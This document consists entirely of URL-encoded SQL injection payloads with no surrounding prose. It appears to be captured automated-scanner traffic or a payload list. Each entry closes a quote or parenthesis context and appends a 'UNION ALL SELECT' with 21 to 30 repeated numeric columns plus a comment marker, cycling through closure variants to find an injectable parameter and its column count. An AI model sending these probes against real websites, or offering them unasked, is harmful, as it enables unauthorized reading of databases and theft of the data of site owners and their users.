-5334%27%20UNION%20ALL%20SELECT%207611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%2C7611%23 -5594%27%20UNION%20ALL%20SELECT%205005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%23 -2351%27%20UNION%20ALL%20SELECT%204763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%23 -1584%27%20UNION%20ALL%20SELECT%206261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%2C6261%23 -4438%22%20UNION%20ALL%20SELECT%205723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%2C5723%23 -3549%22%20UNION%20ALL%20SELECT%206298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%23 -6624%22%20UNION%20ALL%20SELECT%206425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%23 -2590%22%20UNION%20ALL%20SELECT%207096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%2C7096%23 -6865%22%20UNION%20ALL%20SELECT%204703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%23 -4568%22%20UNION%20ALL%20SELECT%201321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%2C1321%23 -8039%22%20UNION%20ALL%20SELECT%201755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%2C1755%23 -7691%22%20UNION%20ALL%20SELECT%209100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%23 -8554%22%20UNION%20ALL%20SELECT%208748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%23 -6196%22%20UNION%20ALL%20SELECT%201545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%23 -3565%29%20UNION%20ALL%20SELECT%208728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%23 -9242%29%20UNION%20ALL%20SELECT%202477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%2C2477%23 -7155%29%20UNION%20ALL%20SELECT%209637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%2C9637%23 -1374%29%20UNION%20ALL%20SELECT%203789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%23 -6332%29%20UNION%20ALL%20SELECT%209643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%2C9643%23 -5139%29%20UNION%20ALL%20SELECT%206929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%2C6929%23 -9556%29%20UNION%20ALL%20SELECT%209549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%2C9549%23 -8857%29%20UNION%20ALL%20SELECT%206113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%23 -9488%29%20UNION%20ALL%20SELECT%203101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101%23 -5032%29%20UNION%20ALL%20SELECT%207540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%23 -3024%29%29%20UNION%20ALL%20SELECT%207329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%23 -8255%29%29%20UNION%20ALL%20SELECT%209996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%23 -9262%29%29%20UNION%20ALL%20SELECT%202247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%2C2247%23 -4398%29%29%20UNION%20ALL%20SELECT%201956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%23 -6694%29%29%20UNION%20ALL%20SELECT%206578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%2C6578%23 -6049%29%29%20UNION%20ALL%20SELECT%201424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%23 -4208%29%29%20UNION%20ALL%20SELECT%207544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%23 -5620%29%29%20UNION%20ALL%20SELECT%206317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%23 -9438%29%29%20UNION%20ALL%20SELECT%202582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%2C2582%23 -1824%29%29%20UNION%20ALL%20SELECT%208847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%2C8847%23 -1710%29%29%29%20UNION%20ALL%20SELECT%209378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%23 -4796%29%29%29%20UNION%20ALL%20SELECT%209162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%2C9162%23 -3163%29%29%29%20UNION%20ALL%20SELECT%202278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%2C2278%23 -8896%29%29%29%20UNION%20ALL%20SELECT%202846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%2C2846%23 -8603%29%29%29%20UNION%20ALL%20SELECT%206924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%23 -9787%29%29%29%20UNION%20ALL%20SELECT%208329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%23 -8570%29%29%29%20UNION%20ALL%20SELECT%205691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%2C5691%23 -6388%29%29%29%20UNION%20ALL%20SELECT%206182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%23 -8708%29%29%29%20UNION%20ALL%20SELECT%206797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%23 -6418%29%29%29%20UNION%20ALL%20SELECT%203723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%23 -9653%20UNION%20ALL%20SELECT%203580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580%23 -8342%20UNION%20ALL%20SELECT%201314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%2C1314%23 -3171%20UNION%20ALL%20SELECT%202876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%2C2876%23 -7532%20UNION%20ALL%20SELECT%203125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%23 -4198%20UNION%20ALL%20SELECT%209780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%2C9780%23 -6838%20UNION%20ALL%20SELECT%203385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%2C3385%23 -5399%20UNION%20ALL%20SELECT%201749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%2C1749%23 -2530%20UNION%20ALL%20SELECT%209444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%2C9444%23 -5150%20UNION%20ALL%20SELECT%208855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%23 -8970%20UNION%20ALL%20SELECT%206166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%2C6166%23 -2855%27%29%20UNION%20ALL%20SELECT%205320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%23 -7209%27%29%20UNION%20ALL%20SELECT%202365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%23 -6153%27%29%20UNION%20ALL%20SELECT%205642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%23 -3308%27%29%20UNION%20ALL%20SELECT%203531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%2C3531%23 -6440%27%29%20UNION%20ALL%20SELECT%202224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%23 -5965%27%29%20UNION%20ALL%20SELECT%202749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%23 -7272%27%29%20UNION%20ALL%20SELECT%208886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%23 -7687%27%29%20UNION%20ALL%20SELECT%201667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%23 -6242%27%29%20UNION%20ALL%20SELECT%201689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%2C1689%23 -3657%27%29%20UNION%20ALL%20SELECT%201671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%2C1671%23 -3510%27%29%29%20UNION%20ALL%20SELECT%206436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%23 -4735%27%29%29%20UNION%20ALL%20SELECT%205930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%2C5930%23 -1288%27%29%29%20UNION%20ALL%20SELECT%209750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%2C9750%23 -7384%27%29%29%20UNION%20ALL%20SELECT%201110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%2C1110%23 -4601%27%29%29%20UNION%20ALL%20SELECT%207231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%23 -6418%27%29%29%20UNION%20ALL%20SELECT%209341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%23 -3842%27%29%29%20UNION%20ALL%20SELECT%204275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%2C4275%23 -1014%27%29%29%20UNION%20ALL%20SELECT%204228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%2C4228%23 -2832%27%29%29%20UNION%20ALL%20SELECT%206424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%2C6424%23 -9682%27%29%29%20UNION%20ALL%20SELECT%204236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%23 -1226%27%29%29%29%20UNION%20ALL%20SELECT%203064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%23 -1390%27%29%29%29%20UNION%20ALL%20SELECT%206931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%2C6931%23 -9242%27%29%29%29%20UNION%20ALL%20SELECT%202438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%2C2438%23 -6231%27%29%29%29%20UNION%20ALL%20SELECT%207616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%23 -2708%27%29%29%29%20UNION%20ALL%20SELECT%206745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%2C6745%23 -2510%27%29%29%29%20UNION%20ALL%20SELECT%201011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%23 -8682%27%29%29%29%20UNION%20ALL%20SELECT%202418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%2C2418%23 -4671%27%29%29%29%20UNION%20ALL%20SELECT%205513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%2C5513%23 -1183%27%29%29%29%20UNION%20ALL%20SELECT%201014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%2C1014%23 -5543%27%29%29%29%20UNION%20ALL%20SELECT%203325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%2C3325%23 -4393%27%20UNION%20ALL%20SELECT%204967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%23 -8103%27%20UNION%20ALL%20SELECT%207093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%2C7093%23 -8677%27%20UNION%20ALL%20SELECT%205064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%2C5064%23 -7685%27%20UNION%20ALL%20SELECT%203767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%2C3767%23 -6036%27%20UNION%20ALL%20SELECT%206317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%2C6317%23 -5180%27%20UNION%20ALL%20SELECT%208027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%2C8027%23 -5510%27%20UNION%20ALL%20SELECT%206382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%23 -3549%27%20UNION%20ALL%20SELECT%202114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%23 -8500%27%20UNION%20ALL%20SELECT%204269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%2C4269%23 -9904%27%20UNION%20ALL%20SELECT%202030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%2C2030%23 -1687%27%29%20UNION%20ALL%20SELECT%204452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%2C4452%23 -5755%27%29%20UNION%20ALL%20SELECT%204970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%2C4970%23 -4295%27%29%20UNION%20ALL%20SELECT%203920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%23 -4200%27%29%20UNION%20ALL%20SELECT%208255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%2C8255%23 -2086%27%29%20UNION%20ALL%20SELECT%202408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%23 